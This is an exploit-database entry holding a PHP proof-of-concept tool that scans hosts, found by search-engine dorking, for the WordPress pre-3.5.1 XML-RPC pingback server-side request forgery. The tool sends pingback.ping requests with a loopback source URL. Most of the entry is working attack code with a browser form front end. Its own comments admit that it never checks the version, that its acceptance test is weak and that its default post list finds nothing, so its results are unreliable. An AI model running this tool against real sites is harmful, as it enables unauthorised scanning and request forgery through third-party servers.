## https://sploitus.com/exploit?id=PACKETSTORM:189590
=============================================================================================================================================
| # Title : WordPress before 3.5.1 Pingback Checker Tool |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wordpress.org/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine to find candidate hosts.
[+] Code Description: The XMLRPC API in WordPress before 3.5.1 allows remote attackers to send HTTP requests to intranet servers, and conduct port-scanning attacks, by specifying a crafted source URL for a pingback, related to a Server-Side Request Forgery (SSRF) issue. Note that the script below does not check the WordPress version at all: it reads the X-Pingback header from the target's front page and then asks xmlrpc.php to accept a pingback whose source URL is http://127.0.0.1. A hit therefore only shows that pingback is accepted for that post, not that the install is unpatched — confirm by hand.
[+] save code as poc.php.
[+] Usage : http://127.0.0.1/poc.php — open the page in a browser and submit a host (or host:port). The scan is performed by the web server hosting poc.php, which issues outbound HTTP requests on the submitter's behalf, so run it locally only and do not leave it deployed on a reachable server.
[+] PayLoad :
<?php
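class WordpressPingbackLocator {
    /** Path prefix of the WordPress install on the target, always ending in '/'. */
    private $targetUri;
    /** Maximum number of HTTP redirects followed when POSTing to the XML-RPC endpoint. */
    private $numRedirects;
    /** Whether the mysqli extension is loaded (not a live connection, see checkDatabase()). */
    private $dbActive;
    /** Caller-supplied post URLs to try as pingback targets, or null for the placeholder list. */
    private $blogPosts;
    /** Connect/transfer timeout in seconds; the original cURL call had none and could hang the request. */
    const REQUEST_TIMEOUT = 10;

    /**
     * @param string        $targetUri    Path under which WordPress lives on the target (default '/').
     * @param int           $numRedirects Redirect limit for the XML-RPC POST (0 disables following).
     * @param string[]|null $blogPosts    Post URLs on the target to use as pingback targets. With
     *                                    null the placeholder example.com list is used, which no
     *                                    real target can resolve, so nothing is ever reported.
     */
    public function __construct($targetUri = '/', $numRedirects = 10, $blogPosts = null) {
        $this->targetUri = rtrim($targetUri, '/') . '/';
        $this->numRedirects = max(0, (int) $numRedirects);
        $this->blogPosts = is_array($blogPosts) ? array_values($blogPosts) : null;
        $this->dbActive = $this->checkDatabase();
    }

    /**
     * Report whether the mysqli extension is available. This only tests that the extension is
     * loaded; no connection is attempted and nothing in this class writes to a database.
     */
    private function checkDatabase() {
        return function_exists('mysqli_connect');
    }

    /**
     * Print one status line. $ip comes straight from the HTTP request and header/post values
     * come from the target, and the output lands in an HTML page, so escape it.
     */
    private function out($line) {
        echo htmlspecialchars($line, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }

    /**
     * Accept only host or host:port (no scheme, path, query or userinfo), because $ip is
     * spliced verbatim into the probe URL. IPv6 literals are not accepted by this pattern.
     */
    private function isValidHost($ip) {
        return is_string($ip) && preg_match('/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/', $ip) === 1;
    }

    /**
     * Case-insensitive lookup in a get_headers() map. A header repeated across redirects is
     * returned by get_headers() as an array; the last value belongs to the final response.
     */
    private function findHeader(array $headers, $name) {
        foreach ($headers as $key => $value) {
            if (!is_string($key) || strcasecmp($key, $name) !== 0) {
                continue;
            }
            if (is_array($value)) {
                $value = end($value);
            }
            return is_string($value) ? trim($value) : null;
        }
        return null;
    }

    /**
     * Fetch the target's front-page headers and return the advertised X-Pingback URL, or null
     * when the host is invalid, unreachable, or sends no such header. The returned URL is chosen
     * by the target, so the caller must not trust it blindly (see sendPingbackRequest()).
     */
    public function getXmlRpcUrl($ip) {
        $this->out("$ip - Enumerating XML-RPC URI...\n");
        if (!$this->isValidHost($ip)) {
            $this->out("$ip - Invalid host, expected host[:port]\n");
            return null;
        }
        // get_headers() returns false on a failed request; the original dereferenced it anyway.
        $headers = get_headers("http://$ip{$this->targetUri}", 1);
        $pingback = $headers === false ? null : $this->findHeader($headers, 'X-Pingback');
        if ($pingback !== null && $pingback !== '') {
            return $pingback;
        }
        $this->out("$ip - X-Pingback header not found\n");
        return null;
    }

    /**
     * Build the pingback.ping request body. $target is the *source* URL WordPress will be asked
     * to fetch (the SSRF vector) and $validBlogPost is the post on the target blog being "linked".
     * Both values are XML-escaped; the original spliced them in raw, so a '&' or '<' in a URL
     * produced a malformed document.
     */
    public function generatePingbackXml($target, $validBlogPost) {
        $flags = ENT_XML1 | ENT_QUOTES | ENT_SUBSTITUTE;
        $src = htmlspecialchars((string) $target, $flags, 'UTF-8');
        $dst = htmlspecialchars((string) $validBlogPost, $flags, 'UTF-8');
        return '<?xml version="1.0" encoding="iso-8859-1"?>'
            . '<methodCall><methodName>pingback.ping</methodName>'
            . "<params><param><value><string>$src</string></value></param>"
            . "<param><value><string>$dst</string></value></param>"
            . '</params></methodCall>';
    }

    /**
     * Try each candidate post as a pingback target with a loopback source URL and return the
     * first post the target accepts, or null. A response without fault 33 ("target is not a
     * pingback-enabled resource") is treated as acceptance.
     * NOTE(review): this is a weak oracle -- any other fault code, including whatever a patched
     * WordPress returns for an unusable source URL, also passes the check. Confirm hits by hand.
     */
    public function getBlogPosts($xmlRpc, $ip) {
        foreach ($this->getAllBlogPosts() as $blogPost) {
            // Loopback source: an unpatched xmlrpc.php fetches it from the WordPress host itself.
            $response = $this->sendPingbackRequest($xmlRpc, 'http://127.0.0.1', $blogPost);
            if ($response === null || $response === '') {
                continue;
            }
            if (strpos($response, '<value><int>33</int></value>') === false) {
                $this->out("$ip - Pingback enabled: $blogPost\n");
                return $blogPost;
            }
        }
        return null;
    }

    /**
     * POST one pingback.ping call to $xmlRpc and return the raw response body, or null on a
     * transport failure. $xmlRpc (and any redirect it issues) is target-controlled, so cURL is
     * pinned to HTTP(S) and given a timeout and redirect cap; the original had none of these.
     */
    private function sendPingbackRequest($xmlRpc, $target, $blogPost) {
        $pingbackXml = $this->generatePingbackXml($target, $blogPost);
        $ch = curl_init($xmlRpc);
        if ($ch === false) {
            return null;
        }
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => $pingbackXml,
            CURLOPT_HTTPHEADER => ['Content-Type: text/xml'],
            CURLOPT_FOLLOWLOCATION => $this->numRedirects > 0,
            CURLOPT_MAXREDIRS => $this->numRedirects,
            CURLOPT_CONNECTTIMEOUT => self::REQUEST_TIMEOUT,
            CURLOPT_TIMEOUT => self::REQUEST_TIMEOUT,
            // Keep a hostile target from steering this host at file://, gopher://, etc.
            CURLOPT_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        ]);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response === false ? null : $response;
    }

    /**
     * Candidate posts on the target. The placeholder list is kept for backward compatibility,
     * but example.com URLs are never posts on the target, so WordPress answers fault 33 for each
     * of them and nothing is reported. Pass real post URLs through the constructor.
     */
    private function getAllBlogPosts() {
        return $this->blogPosts ?? ["http://example.com/post1", "http://example.com/post2"];
    }

    /**
     * Full check for one host: find the XML-RPC endpoint, then probe pingback for each candidate
     * post. A missing X-Pingback header is reported as "not vulnerable", which is only what this
     * probe can see; xmlrpc.php may still be present.
     */
    public function runHost($ip) {
        $this->out("$ip - Checking if it's a WordPress site...\n");
        $xmlrpc = $this->getXmlRpcUrl($ip);
        if ($xmlrpc === null) {
            $this->out("$ip - Not vulnerable or not a WordPress site\n");
            return;
        }
        $blogPost = $this->getBlogPosts($xmlrpc, $ip);
        if ($blogPost === null) {
            $this->out("$ip - X-Pingback enabled but no vulnerable blogs found\n");
            return;
        }
        // The original reported a hit as "no vulnerable blogs found" whenever mysqli was not
        // loaded; the hit is now always recorded. $dbActive is set but not otherwise used.
        $this->storeVuln($ip, $blogPost);
    }

    /**
     * Record a hit. Despite the name there is no persistence: this only prints the result.
     */
    private function storeVuln($ip, $blog) {
        $this->out("Stored vulnerability: $ip - Pingback found at $blog\n");
    }
}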
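if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $raw = $_POST['target'] ?? '';
    $target = is_string($raw) ? trim($raw) : '';
    // Accept host or host:port only -- the value is spliced verbatim into the probe URL, so a
    // path, query or userinfo would let the submitter steer the request.
    // NOTE(review): there is no authentication or CSRF token on this form. Wherever this script
    // is served, anyone who can POST to it can make that server issue requests to other hosts.
    if ($target !== '' && preg_match('/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/', $target) === 1) {
        $scanner = new WordpressPingbackLocator('/wordpress/');
        $scanner->runHost($target);
    }
}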
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>فحص WordPress Pingback</title>
</head>
<body>
<!-- Scan results are echoed by the PHP block above this document, i.e. before the doctype, as plain text lines. -->
<h2>أداة فحص WordPress Pingback</h2>
<!-- No CSRF token and no authentication: any page the operator visits can auto-submit this form
     and have the hosting server probe a host of the attacker's choosing. Do not leave this deployed. -->
<form method="POST">
<label for="target">أدخل عنوان الموقع:</label>
<input type="text" id="target" name="target" required>
<button type="submit">فحص</button>
</form>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================